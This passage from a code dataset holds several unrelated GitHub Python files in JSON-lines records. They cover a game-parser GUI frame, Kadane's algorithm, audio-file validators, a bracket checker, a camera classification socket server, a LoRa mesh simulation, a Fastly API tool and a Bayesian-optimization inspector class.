self.after_cancel(self.data_after_id)\n self.data_after_id = None\n return\n if settings[\"screen\"][\"perf\"] is False:\n string = self.DATA_STR_BASE.format(\"Screen parsing performance profiling disabled\\n\")\n self.data.set(string)\n return\n perf = self.parser.perf_string\n self.data_after_id = self.after(1000, self.update_data_string)\n if perf is None:\n return\n elif len(perf) == 0:\n string = self.DATA_STR_BASE.format(\"No slow screen parsing features\\n\")\n else:\n string = self.DATA_STR_BASE.format(perf)\n self.data.set(string)\n\n def update_overlay(self):\n \"\"\"Update the Overlay with the text from the RealTimeParser\"\"\"\n if self.parser is None or not isinstance(self.parser, RealTimeParser):\n print(\"[RealTimeFrame] Cancelling Overlay update.\")\n return\n string = self.parser.overlay_string\n if string is not None:\n self.overlay.update_text(string)\n self.overlay.update_disabled(self.parser.disabled_string)\n if self._event_overlay is not None:\n assert isinstance(self._event_overlay, EventOverlay)\n self._event_overlay.update_events()\n self.overlay_after_id = self.after(100, self.update_overlay)\n\n def close_overlay(self):\n \"\"\"Close the overlay\"\"\"\n if self.overlay_after_id is not None:\n self.after_cancel(self.overlay_after_id)\n if self.overlay is not None:\n self.overlay.destroy()\n self.overlay = None\n self.overlay_after_id = None\n if self._event_overlay is not None:\n self._event_overlay.destroy()\n self._event_overlay = None\n\n def update_characters(self, *args):\n \"\"\"Update the characters shown in the character dropdown\"\"\"\n if len(args) == 0:\n return\n server = args[0]\n if \"Choose\" in server:\n return\n self.character_dropdown[\"menu\"].delete(0, tk.END)\n characters = [\"Choose Character\"]\n if server not in self.window.characters_frame.servers.values():\n return\n for data in self.window.characters_frame.characters:\n character_server = self.window.characters_frame.servers[data[0]]\n if character_server != server:\n continue\n characters.append(data[1])\n for character in sorted(characters):\n self.character_dropdown[\"menu\"].add_command(\n label=character, command=lambda value=character: self.character.set(value))\n\n @property\n def character_data(self):\n \"\"\"Return Character Data tuple for selected character or None\"\"\"\n if \"Choose\" in self.server.get() or \"Choose\" in self.character.get():\n return None\n reverse_servers = {value: key for key, value in self.window.characters_frame.servers.items()}\n server = reverse_servers[self.server.get()]\n return server, self.character.get()\n\n def check_alive(self):\n \"\"\"Check if the RealTimeParser is still alive\"\"\"\n if self.parser is None:\n self._rtp_id = None\n return\n if self.parser.is_alive() is False:\n self.stop_parsing()\n return\n self._rtp_id = self.after(100, self.check_alive)\n","repo_name":"RedFantom/gsf-parser","sub_path":"frames/realtime.py","file_name":"realtime.py","file_ext":"py","file_size_in_byte":14318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"7606558677","text":"def largest_continuous_sum(array: list) -> int:\n max_sum = 0\n max_start = None\n max_end = None\n\n for window_size in range(1, len(array)):\n for i in range(len(array)):\n start = i\n end = i + window_size\n if end <= len(array):\n s = sum(array[start:end])\n if s > max_sum:\n max_sum = s\n max_start = start\n max_end = end\n else:\n pass\n\n print(f\"sum(array[{max_start},{max_end}] = {max_sum}\")\n return 
max_sum\n\n\ndef kadane_algorithm(array: list) -> int:\n    if len(array) == 0:\n        return 0\n\n    max_sum = current_sum = array[0]\n\n    for number in array[1:]:\n        # either extend the current run or restart it at this element\n        current_sum = max(number, current_sum + number)\n        max_sum = max(max_sum, current_sum)\n\n    return max_sum\n\n\ndef kadane_algorithm_with_bounds(array: list) -> float:\n    if len(array) == 0:\n        return 0\n\n    max_so_far = float('-inf')\n    max_ending_here = 0\n    start = 0\n    end = 0\n    s = 0\n\n    for i in range(len(array)):\n        max_ending_here += array[i]\n\n        if max_so_far < max_ending_here:\n            max_so_far = max_ending_here\n            start = s\n            end = i\n\n        if max_ending_here < 0:\n            max_ending_here = 0\n            s = i + 1\n\n    print(f\"sum(array[{start}:{end}]) = {max_so_far}\")\n    return max_so_far\n\n\nif __name__ == \"__main__\":\n    from nose.tools import assert_equal\n\n\n    class LargeContTest(object):\n        def test(self, sol):\n            assert_equal(sol([1, 2, -1, 3, 4, -1]), 9)\n            assert_equal(sol([1, 2, -1, 3, 4, 10, 10, -10, -1]), 29)\n            assert_equal(sol([-1, 1]), 1)\n            print('ALL TEST CASES PASSED')\n\n\n    # Run Test\n    t = LargeContTest()\n    t.test(kadane_algorithm_with_bounds)\n","repo_name":"b1ck0/python_coding_problems","sub_path":"Sequences/005_largest_continuous_sum.py","file_name":"005_largest_continuous_sum.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"30836416858","text":"import os\nimport re\nimport py_file_type as magic\nfrom audio_extract import utils\nfrom audio_extract.exceptions import AudioExtractException\n\n\ndef is_valid_hms(time: str) -> bool:\n    if type(time) is not str:\n        return False\n    # Pattern to match HH:MM:SS or MM:SS\n    pattern = r\"^(?:(?:[0-1]\\d|2[0-3]):[0-5]\\d:[0-5]\\d|(?:(?:[0-5]?\\d):)?[0-5]\\d)$\"\n    # Check if the time string matches the pattern\n    match = re.match(pattern, time)\n    # Return True if match is found, False otherwise\n    return match is not None\n\n\ndef extract_full_audio_validation(path: str, start_time: str) -> bool:\n    if not os.path.exists(path):\n        raise AudioExtractException(f\"{path} was not found.\")\n\n    valid_media = ('video/mp4', 'audio/mpeg')\n    type_check = magic.from_file(path, mime=True)\n    if type_check not in valid_media:\n        raise AudioExtractException(f\"Invalid input file, {type_check} doesn't match video/audio media.\")\n\n    if not is_valid_hms(start_time):\n        raise AudioExtractException(f\"Invalid start time format, valid formats are \\\"HH:MM:SS\\\" or \\\"MM:SS\\\".\")\n\n    media_duration = utils.media_duration(path)\n    formatted_media_duration = utils.seconds_to_hms(media_duration)\n\n    start_time_seconds = utils.hms_to_seconds(start_time)\n    if start_time_seconds > media_duration:\n        raise AudioExtractException(\n            f\"Start time can't be bigger than input file duration \\\"{formatted_media_duration}\\\".\")\n\n    return True\n\n\ndef extract_sub_audio_validation(path: str, start_time: str, duration: str) -> bool:\n    if not os.path.exists(path):\n        raise AudioExtractException(f\"{path} was not found.\")\n\n    type_check = magic.from_file(path, mime=True)\n    if 'audio' not in type_check and 'video' not in type_check:\n        raise AudioExtractException(f\"Invalid input file, {type_check} doesn't match video/audio media.\")\n\n    if not is_valid_hms(start_time):\n        raise AudioExtractException(f\"Invalid start time format, valid formats are \\\"HH:MM:SS\\\" or \\\"MM:SS\\\".\")\n\n    if not is_valid_hms(duration):\n        raise AudioExtractException(f\"Invalid duration format, valid formats are \\\"HH:MM:SS\\\" or \\\"MM:SS\\\".\")\n\n    
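# The remaining checks are plain arithmetic on seconds. For example, for a\n    # 90 s file with start_time \"01:00\" (60 s), any duration above \"00:30\"\n    # is rejected, since the duration can't exceed file length minus start time.\n    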
file_duration_seconds = utils.media_duration(path)\n formatted_media_duration = utils.seconds_to_hms(file_duration_seconds)\n\n start_time_seconds = utils.hms_to_seconds(start_time)\n if start_time_seconds > file_duration_seconds:\n raise AudioExtractException(\n f\"Start time can't be bigger than input file duration \\\"{formatted_media_duration}\\\".\")\n\n duration_seconds = utils.hms_to_seconds(duration)\n if duration_seconds > (file_duration_seconds - start_time_seconds):\n raise AudioExtractException(\n f\"Invalid duration, new duration can't exceed file duration.\")\n\n return True\n","repo_name":"konichiwa55115/audio-extract","sub_path":"audio_extract/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"97"} +{"seq_id":"74608376640","text":"import sys\nstring = list(sys.stdin.readline().rstrip())\nwhile string[0] != '.' :\n stack = []\n for i in string :\n if len(stack) > 0 and stack[-1] == '(' and i == ')' :\n stack.pop()\n elif len(stack) > 0 and stack[-1] == '[' and i == ']' :\n stack.pop()\n elif i == '(' or i == '[' or i == ']' or i == ')' :\n stack.append(i)\n if len(stack) == 0 :\n print('yes')\n else :\n print('no')\n string = list(sys.stdin.readline().rstrip())\n stack = []","repo_name":"theunghee02/CodeTIL","sub_path":"승희/BaekJoon/스택, 큐, 덱/4949.py","file_name":"4949.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"117297428","text":"import numpy as np\nfrom tensorflow import keras\nimport cv2\nfrom custom_socket import CustomSocket\nimport json\nimport traceback\n\nwtf_color_model = keras.models.load_model(\"model\\wtf_color_det\")\nwtf_shape_model = keras.models.load_model(\"model\\wtf_shape_det\")\nCOLOR_LIST = (\"blue\", \"red\", \"yellow\", \"purple\", \"green\", \"orange\", \"pink\", \"wine\", \"mint\", \"none\")\nSHAPE_LIST = (\"circle\", \"hex\", \"pill\", \"pie\", \"none\")\n\n\ndef get_center_list(f_w, f_h, nw, nh):\n l = []\n for h in range(nh):\n for w in range(nw):\n l += [(int(w / nw * f_w + f_w / nw / 2), int(h / nh * f_h + f_h / nh / 2))]\n\n return l\n\n\ndef get_start_point_list(f_w, f_h, nw, nh):\n l = []\n for h in range(nh):\n for w in range(nw):\n l += [(int(w / nw * f_w), int(h / nh * f_h))]\n\n return l\n\n\ndef draw_grid(pic, w, h, color, thickness):\n ph, pw, _ = pic.shape\n for i in range(1, h):\n cv2.line(pic, (0, int(ph * i / h)), (pw, int(ph * i / h)), color, thickness)\n for i in range(1, w):\n cv2.line(pic, (int(pw * i / w), 0), (int(pw * i / w), ph), color, thickness)\n\n\ndef draw_circle(pic, center_list, radius, color, thickness):\n for center in center_list:\n cv2.circle(pic, center, radius, color, thickness)\n\n\ndef draw_points(pic, center, d, color):\n cx, cy = center\n\n pic[cy, cx] = color\n pic[cy - d, cx] = color\n pic[cy + d, cx] = color\n pic[cy, cx - d] = color\n pic[cy, cx + d] = color\n\n\ndef get_color_data(pic, center, d):\n # dl = []\n cx, cy = center\n return \",\".join(map(str, (*pic[cy, cx], *pic[cy - d, cx], *pic[cy + d, cx], *pic[cy, cx - d], *pic[cy, cx + d])))\n\n\ndef get_shape_data(pic_gray, start_point):\n sx, sy = start_point\n return \",\".join(map(str, pic_gray[sy + 1:sy + SLOT_DIM - 1, sx + 1:sx + SLOT_DIM - 1].flatten()))\n\n\ndef get_color_data_list(pic, center, d):\n cx, cy = center\n return np.array([*pic[cy, cx], *pic[cy - d, cx], *pic[cy + d, cx], *pic[cy, cx - d], *pic[cy, cx + 
d]]).astype(\n \"uint8\")\n\n\ndef get_shape_data_list(pic_gray, start_point):\n sx, sy = start_point\n return np.array(((pic_gray[sy + 1:sy + SLOT_DIM - 1, sx + 1:sx + SLOT_DIM - 1] + 1) % 256).flatten()).astype(\n \"uint8\")\n\n\nRESIZE_DIM = 240\nTOPLEFT, BOTRIGHT = [126, 29], [520, 427]\nSLOT_DIM = RESIZE_DIM // 6\npos_index = 0\nn_slot = 1\nlabel = 0\n\nl = []\nfor i in range(10):\n try:\n ret, frame = cv2.VideoCapture(i).read()\n if not ret:\n continue\n l += [i]\n except:\n continue\n\nprint(l)\n\ncap = cv2.VideoCapture(int(input(\"Cam index: \")))\nf_w, f_h = cap.get(3), cap.get(4)\n\ncenter_list = get_center_list(RESIZE_DIM, RESIZE_DIM, 6, 6)\nstart_point_list = get_start_point_list(RESIZE_DIM, RESIZE_DIM, 6, 6)\n\n# print(center_list)\n\n\nHOST = \"localhost\"\nPORT = 10000\nprint(HOST)\n\nserver = CustomSocket(HOST, PORT)\nserver.startServer()\n\nwhile True:\n # Wait for connection from client :}\n conn, addr = server.sock.accept()\n print(\"Client connected from\", addr)\n\n while cap.isOpened():\n\n try:\n\n data = np.frombuffer(server.recvMsg(conn), dtype=np.uint8)[0]\n print(data)\n\n ret, frame = cap.read()\n frame_bgr = cv2.resize(frame[TOPLEFT[1]: BOTRIGHT[1], TOPLEFT[0]:BOTRIGHT[0]], (RESIZE_DIM, RESIZE_DIM))\n frame_show = np.copy(frame_bgr)\n frame_gray = cv2.cvtColor(frame_show, cv2.COLOR_BGR2GRAY)\n\n for i in range(RESIZE_DIM):\n for j in range(RESIZE_DIM):\n b, g, r = map(int, frame_show[i, j])\n # print((b+g+r/3))\n m = (b + g + r) / 3\n\n if m > 100 and ((b - m) ** 2 + (g - m) ** 2 + (r - m) ** 2) < 400:\n frame_gray[i, j] = 255\n # print(\"yes\")\n else:\n frame_gray[i, j] = 0\n\n if not ret:\n print(\"Error\")\n continue\n\n draw_grid(frame_show, 6, 6, (0, 0, 0), 1)\n\n for n in range(n_slot):\n draw_points(frame_show, center_list[(pos_index + n) % 36], 6, (0, 0, 0))\n\n frame_show = cv2.resize(frame_show, (480, 480))\n cv2.imshow(\"frame\", frame_show)\n\n # sx, sy = center_list[pos_index]\n # cv2.imshow(\"frameg\", frame_gray)\n # cv2.imshow(\"id_frame\", frame_gray[sy + 1:sy + SLOT_DIM - 1, sx + 1:sx + SLOT_DIM - 1])\n\n key = cv2.waitKey(1)\n\n # color_l = get_color_data_list(frame_bgr, center_list[pos_index], 6)\n all_color_list = []\n for cen in center_list:\n all_color_list += [get_color_data_list(frame_bgr, cen, 6)]\n # print(all_color_list)\n color_res = np.argmax(wtf_color_model.predict(np.array(all_color_list), verbose=0), axis=1)\n print(color_res)\n\n all_shape_list = []\n for stp in start_point_list:\n all_shape_list += [get_shape_data_list(frame_gray, stp)]\n\n shape_res = np.argmax(wtf_shape_model.predict(np.array(all_shape_list), verbose=0), axis=1)\n print(shape_res)\n\n if data == 1:\n server.sendMsg(conn, json.dumps({\"c\": list(map(int, color_res))}))\n if data == 0:\n server.sendMsg(conn, json.dumps({\"s\": list(map(int, shape_res))}))\n\n\n if key == ord('q'):\n cap.release()\n elif key == ord('n'):\n pos_index = (pos_index + 1) % 36\n\n\n\n except Exception as e:\n traceback.print_exc()\n print(e)\n print(\"Connection Closed\")\n break\n\n cv2.destroyAllWindows()\n","repo_name":"GemsLoveNLP/BB-C","sub_path":"cammain.py","file_name":"cammain.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"277906537","text":"def max_wait(id):\n return int(0.5*id*(id+5))+id\n # return id**2+id\ndef upper_limit_map(count):\n return int((count*(count+1)*(count+8))/6)\n\nclass Lora:\n def 
__init__(self,name:str,id:int,connections:list,data_rate:int,SD_rate:int,internet=False,total_nodes=1):\n self.name=name\n self.id=id\n connections.sort(key = lambda connections: connections[1])\n self.connections = connections\n self.data_rate=data_rate\n self.SD_rate = SD_rate\n self.incomming=[]\n self.outgoing=[]\n self.time_count=0\n self.state=\"\"\n self.wait=0\n self.looking_at = []\n self.turns=[]\n self.internet=internet\n self.conductor=False\n self.upstream=[]\n self.downstream=[]\n self.distance_from_internet=125\n if self.internet: self.distance_from_internet = 0\n self.total_nodes=total_nodes\n\n def tick(self,count=1):\n if len(self.incomming)>0:\n if 0 in self.incomming:\n index=self.incomming.index(0)\n self.looking_at=self.incomming[0:index]\n self.incomming=self.incomming[index+1:]\n if self.looking_at[0]==128:\n if self.id in self.looking_at[2:]:\n index=self.looking_at[2:].index(self.id)\n if not self.looking_at[-1] in self.upstream:\n self.upstream.append(self.looking_at[-1])\n else:\n if self.state==\"\" or self.state == \"map_wait\":\n self.distance_from_internet = min(len(self.looking_at[2:]),self.distance_from_internet)\n for node in self.looking_at[2:]:\n if not node in self.downstream:\n self.downstream.append(node)\n self.state=\"map_wait\"\n self.wait=max_wait(self.id)\n\n if self.state==\"map_wait\":\n if self.wait>1:\n self.wait-=1\n return\n if self.wait==1:\n self.outgoing=self.looking_at[:2]+self.downstream+[self.id]+[0]\n self.state=\"map_done\"\n self.wait=0\n else:\n self.state=\"\"\n self.wait=0\n\n if self.state == \"\":\n if self.internet:\n self.state = \"map_done\"\n self.outgoing=[128,self.total_nodes,1,0]\n self.id=1\n def show_view(self):\n print(self.name,\" upstream\",self.upstream,\" downstream\",self.downstream, \"dist\",self.distance_from_internet)\n \n\n\nclass Network:\n def __init__(self,nodes):\n self.map={}\n for node in nodes:\n self.map[node.name]=node\n \n def resolve(self):\n for node in self.map:\n for target, db in self.map[node].connections:\n if len(self.map[target].outgoing)>0:\n # print(\"adding\",target,\"to\",node)\n self.map[node].incomming.append(self.map[target].outgoing[0])\n break\n for node in self.map:\n if len(self.map[node].outgoing)>0:\n self.map[node].outgoing.pop(0)\n def tick(self,count=1):\n for i in range(count):\n for node in self.map:\n self.map[node].tick()\n print(mesh)\n self.resolve()\n \n def __repr__(self):\n temp=''\n for node in self.map:\n temp+= str(node)+\" ^\"+str(self.map[node].outgoing)+\" v\"+str(self.map[node].incomming)+\" w\"+str(self.map[node].wait)+\" s \"+str(self.map[node].state)+\"\\n\"\n\n return temp\n def show_view(self):\n for node in self.map:\n self.map[node].show_view()\n\n\n# TEST CASES\n\n\n# nodea=Lora(\"1\",1,[[\"2\",-20],],0,0,True,6)\n# nodeb=Lora(\"2\",2,[[\"1\",-20],[\"3\",-40],[\"4\",-40]],0,0,False)\n# nodec=Lora(\"3\",3,[[\"2\",-40],[\"5\",-30],[\"6\",-40]],0,0,False)\n# noded=Lora(\"4\",4,[[\"2\",-40],[\"5\",-40]],0,0,False)\n# nodee=Lora(\"5\",5,[[\"3\",-40],[\"4\",-30]],0,0,False)\n# nodef=Lora(\"6\",6,[[\"3\",-40]],0,0,False)\n\n# 
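mesh=Network([nodea,nodeb,nodec,noded,nodee,nodef])\n\n# Worked example for the timing helpers defined at the top of the file\n# (illustrative arithmetic only, following the formulas directly):\n#   max_wait(3)        = int(0.5*3*(3+5)) + 3 = 15 ticks\n#   upper_limit_map(6) = int((6*7*(6+8))/6)   = 98 ticks\n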
\nnodea=Lora(\"1\",1,[[\"4\",-20],],0,0,True,6)\nnodeb=Lora(\"2\",2,[[\"4\",-20],[\"5\",-40]],0,0,False)\nnodec=Lora(\"3\",3,[[\"4\",-40],[\"5\",-30]],0,0,False)\nnoded=Lora(\"4\",4,[[\"6\",-40],[\"3\",-40],[\"2\",-40],[\"1\",-40]],0,0,False)\nnodee=Lora(\"5\",5,[[\"2\",-40],[\"3\",-30]],0,0,False)\nnodef=Lora(\"6\",6,[[\"4\",-40]],0,0,False)\n\nmesh=Network([nodea,nodeb,nodec,noded,nodee,nodef])\n\nprint(mesh)\nmesh.tick(10)\n\nmesh.tick(17)\nmesh.show_view()\nmesh.tick(20)\nmesh.show_view()\nmesh.tick(upper_limit_map(6))\nmesh.show_view()\n","repo_name":"supamee/sandbox","sub_path":"lora/lora.py","file_name":"lora.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"42221147754","text":"import logging\nfrom typing import Generator\n\nimport networkx as nx\n\n\ndef dept_first_search(graph: nx.Graph, node=None) -> Generator:\n    if node is None:\n        try:\n            node = list(graph.nodes)[0]\n        except Exception as e:\n            logging.warning('empty graph in dept_first_search')\n            logging.warning(e)\n            return []\n    stack = []\n    visited = [node]\n    stack.append(node)\n    while stack:\n        neighbors = graph.neighbors(stack[-1])\n        new_neighbors = [n for n in neighbors if n not in visited]\n        stack += new_neighbors\n        visited += new_neighbors\n        yield stack.pop()\n","repo_name":"AdamMartinCote/algosandbox","sub_path":"algosandbox/graphtraversal/graphtraversal.py","file_name":"graphtraversal.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"72645121920","text":"from os import system, name\nfrom xml.dom import minidom\nimport scripts\nimport requests\nimport pandas\nfrom pandas.io.json import json_normalize\nimport pprint\n\nclass DataFrameFromDict(object):\n    def __init__(self, data):\n        self.df = json_normalize(data)\n        self.columns = list(self.df.columns.values)\n    def __enter__(self):\n        return self.df\n    def __exit__(self, exc_type, exc_val, exc_tb):\n        self.df.drop([c for c in self.columns], axis=1, inplace=True)\n\nclass bcolors:\n    HEADER = '\\033[95m'\n    OKBLUE = '\\033[94m'\n    OKGREEN = '\\033[92m'\n    WARNING = '\\033[93m'\n    FAIL = '\\033[91m'\n    ENDC = '\\033[0m'\n    BOLD = '\\033[1m'\n    UNDERLINE = '\\033[4m'\n\n# define our clear screen function\ndef clear():\n    # for windows\n    if name == 'nt':\n        _ = system('cls')\n    # for mac and linux (here, os.name is 'posix')\n    else:\n        _ = system('clear')\n\ndef getKeyFromConfig():\n    configXML = minidom.parse('Config.xml')\n    items = configXML.getElementsByTagName('item')\n    return str(items[0].childNodes[0].data)\n\ndef mainMenu():\n    while True:\n        scripts.clear()\n        # Display menu options\n        print(' ' + scripts.bcolors.BOLD + scripts.bcolors.UNDERLINE + scripts.bcolors.HEADER + 'MAIN MENU' + \\\n            scripts.bcolors.ENDC + scripts.bcolors.ENDC + scripts.bcolors.ENDC)\n        print(scripts.bcolors.HEADER + '===========' + scripts.bcolors.ENDC)\n        print('1: WAF')\n        print('2: CDN')\n        print('3: List Services')\n        print('4: Check API Key')\n        print('5: Generate API Key')\n        print('6: List API Keys')\n        print('0: Revoke API Key')\n        print('Q to quit')\n        print(scripts.bcolors.HEADER + '===========' + scripts.bcolors.ENDC)\n        print(' ')\n        choice = input('Option: ').strip(' ')  # get user's choice\n\n        if choice == '1':\n            scripts.clear()\n            scripts.WAFMenu()\n        elif choice == '2':\n            scripts.clear()\n            scripts.CDNMenu()\n        elif choice == '3':\n            
scripts.clear()\n scripts.listServices()\n elif choice == '4':\n scripts.clear()\n scripts.checkAPI()\n elif choice == '5':\n scripts.clear()\n scripts.generateKey() \n elif choice == '6':\n scripts.clear()\n scripts.getAllTokens()\n elif choice == '0':\n scripts.clear()\n scripts.revokeKey()\n elif choice == 'Q' or choice == 'q':\n exit()\n else:\n input('Not a valid choice. Hit enter to continue...')\n\ndef getServicesObj():\n if scripts.checkAPINoPrint():\n print(\"This may take a while. Enumerating services...\")\n header={\"Accept\":\"application/json\"}\n header.update({\"Fastly-Key\":scripts.getKeyFromConfig()})\n r=requests.get(\"https://api.fastly.com/service\",headers=header)\n if r.status_code == 401:\n input(scripts.bcolors.WARNING + \"Error with services request.\\nStatus: \" + str(r.status_code) + \"\\nPress ENTER to continue...\" + scripts.bcolors.ENDC)\n elif r.status_code == 200:\n services = r.json()\n with DataFrameFromDict(services) as df:\n df['ID'] = df['id']\n df['Name'] = df['name']\n df['Version'] = df['version']\n df.insert(3, 'Domain(s)', None)\n # print(df)\n for x in range(len(df.index)):\n if not df['Version'].isnull().iloc[x]:\n id = str(df['ID'].iloc[x])\n # print(\"https://api.fastly.com/service/\" + id + \"/domain\")\n r2=requests.get(\"https://api.fastly.com/service/\" + id + \"/domain\",headers=header)\n # pprint.pprint(r2.json())\n returns=json_normalize(r2.json())\n if r2.json():\n returnlist = returns['name'].tolist()\n df.at[x,'Domain(s)'] = \", \".join(returnlist)\n return df\n else:\n input(scripts.bcolors.WARNING + \"Error with services request.\\nStatus: \" + str(r.status_code) + \"\\nPress ENTER to continue...\" + scripts.bcolors.ENDC)\n else:\n input(scripts.bcolors.WARNING + \"Error with API Key, generate a new one. Press ENTER to continue...\" + scripts.bcolors.ENDC)\n\ndef getDetails(df):\n pandas.set_option('display.max_colwidth', -1)\n print(scripts.bcolors.OKBLUE + scripts.bcolors.UNDERLINE + \"FASTLY SERVICES\" + scripts.bcolors.ENDC + scripts.bcolors.ENDC)\n print(df)\n try:\n inVar = int(input(\"\\n\\nEnter index of service to view details: \"))\n print(str(df['Name'].iloc[inVar]))\n print(str(df['ID'].iloc[inVar]))\n except:\n e = input(\"Not a valid number. 
Press enter to continue or E to exit...\")\n if e.strip(' ').lower() == 'e':\n clear()\n mainMenu()\n clear()\n getDetails(df)\n header={\"Accept\":\"application/json\"}\n header.update({\"Fastly-Key\":scripts.getKeyFromConfig()})\n r=requests.get(\"https://api.fastly.com/service/\" + str(df['ID'].iloc[inVar]) + \"/details\",headers=header)\n if r.status_code == 401:\n input(scripts.bcolors.WARNING + \"Error with services request.\\nStatus: \" + str(r.status_code) + \"\\nPress ENTER to continue...\" + scripts.bcolors.ENDC)\n elif r.status_code == 200:\n services = r.json()\n # pprint.pprint(services['versions'])\n print(\"Active/Deployed Version: \" + str(services['active_version']['number']))\n with DataFrameFromDict(services['versions']) as df2:\n df2['Version'] = df2['number']\n df2['Created On'] = df2['created_at']\n df2['Updated On'] = df2['updated_at']\n df2['Locked'] = df2['locked']\n df2['Staging'] = df2['staging']\n df2['Testing'] = df2['testing']\n df2['Comment'] = df2['comment']\n print(df2.to_string(index=False))\n while \"Not a valid response.\":\n reply = str(input(\"View another service [Y/n]: \")).lower().strip()\n if reply == 'y':\n clear()\n getDetails(df)\n if reply == 'n':\n mainMenu()\n\ndef listServices():\n df = getServicesObj()\n getDetails(df)\n\ndef listServicesNoPrint():\n if scripts.checkAPINoPrint():\n print(\"This may take a while. Enumerating services...\")\n header={\"Accept\":\"application/json\"}\n header.update({\"Fastly-Key\":scripts.getKeyFromConfig()})\n r=requests.get(\"https://api.fastly.com/service\",headers=header)\n if r.status_code == 401:\n input(scripts.bcolors.WARNING + \"Error with services request.\\nStatus: \" + str(r.status_code) + \"\\nPress ENTER to continue...\" + scripts.bcolors.ENDC)\n elif r.status_code == 200:\n services = r.json()\n with DataFrameFromDict(services) as df:\n df['ID'] = df['id']\n df['Name'] = df['name']\n df['Version'] = df['version']\n df.insert(3, 'Domain(s)', None)\n # print(df)\n for x in range(len(df.index)):\n if not df['Version'].isnull().iloc[x]:\n id = str(df['ID'].iloc[x])\n # print(\"https://api.fastly.com/service/\" + id + \"/domain\")\n r2=requests.get(\"https://api.fastly.com/service/\" + id + \"/domain\",headers=header)\n # pprint.pprint(r2.json())\n returns=json_normalize(r2.json())\n if r2.json():\n returnlist = returns['name'].tolist()\n df.at[x,'Domain(s)'] =\", \".join(returnlist)\n pandas.set_option('display.max_colwidth', -1)\n return df\n else:\n input(scripts.bcolors.WARNING + \"Error with services request.\\nStatus: \" + str(r.status_code) + \"\\nPress ENTER to continue...\" + scripts.bcolors.ENDC)\n else:\n input(scripts.bcolors.WARNING + \"Error with API Key, generate a new one. 
Press ENTER to continue...\" + scripts.bcolors.ENDC)","repo_name":"hummelm10/FastlyPythonAPI","sub_path":"FastlyPythonCLI/scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8058,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"97"} +{"seq_id":"32105028928","text":"#from __future__ import annotations\n# Libs\nfrom copy import deepcopy\nimport numpy as np\nimport h5py\nimport dill as pickle\n\n# Internal\nfrom bayesian_optimization.utils.utils import get_grid_points_multidimensional_and_grid\nfrom bayesian_optimization.estimators import estimator\n\n# Type hints\nfrom typing import *\nfrom typing import NoReturn\n\nif TYPE_CHECKING:\n from bayesian_optimization.context.context import Context\n from bayesian_optimization.estimators import estimator\n from configobj import ConfigObj\n\n\nclass Inspector:\n \"\"\"Class used to store data from various processes. Main goal is to store temporary results as well as\n inspection data which then can be used to verify the processes.\n However this all can also be used to store further meta data such as time spent for certain calculations.\n \"\"\"\n\n def __init__(\n self,\n lower_bounds: np.array,\n upper_bounds: np.array,\n n_test_points: int,\n inspector_path: str = None,\n do_estimate_test_data: bool = False,\n do_inspect_estimation: bool = False,\n do_inspect_optimization: bool = False,\n do_inspect_nn_model_fit: bool = False,\n do_inspect_acq: bool = False,\n store_estimators: bool = False,\n ):\n \"\"\"constructor\n :param lower_bounds: lower bound for each dimension constraining space where to sample inspection data from\n :param upper_bounds: upper bound for each dimension constraining space where to sample inspection data from\n :param n_test_points: number of inspection points (per dimension)\n :param do_estimate_test_data: apply the estimation to the test data to get mu, sigma for inspection points.\n :param do_inspect_estimation: get inspection data for estimation\n :param do_inspect_optimization: get inspection data for optimization\n :param do_inspect_nn_model_fit: get inspection data for model fit\n \"\"\"\n self.lower_bounds: np.array = lower_bounds\n self.upper_bounds: np.array = upper_bounds\n self.n_test_points: int = n_test_points\n self.inspector_path = inspector_path\n test_points, grid = get_grid_points_multidimensional_and_grid(self.lower_bounds, self.upper_bounds, self.n_test_points)\n self.test_x: np.array = test_points\n self.test_grid: np.array = grid\n self.test_y: Union[np.array, None] = None\n self.context: Union[Context, None] = None\n # Estimator\n self.estimate_test_data: bool = do_estimate_test_data\n self.inspect_estimation: bool = do_inspect_estimation\n self.store_estimators: bool = store_estimators\n self.estimators: np.array = []\n self.estimations: np.array = []\n self.estimations_on_test_data: np.array = []\n # ACQ Optimizer\n self.inspect_optimization: bool = do_inspect_optimization\n self.optimizations: np.array = []\n self.optimization_on_test_data: np.array = []\n # NNModel\n self.inspect_nn_model: bool = do_inspect_nn_model_fit\n self.fits: np.array = []\n # ACQ Func.\n self.inspect_acq: bool = do_inspect_acq\n self.acqs: np.array = []\n self.data_dump_dict = {}\n\n def reset_dump(self) -> NoReturn:\n \"\"\"resets the dict which is used to flexibly store intermediate results\n :return:\n \"\"\"\n self.data_dump_dict = {}\n\n def dump_data(self, key: str, data) -> NoReturn:\n \"\"\"store the given data under the given key into one big 
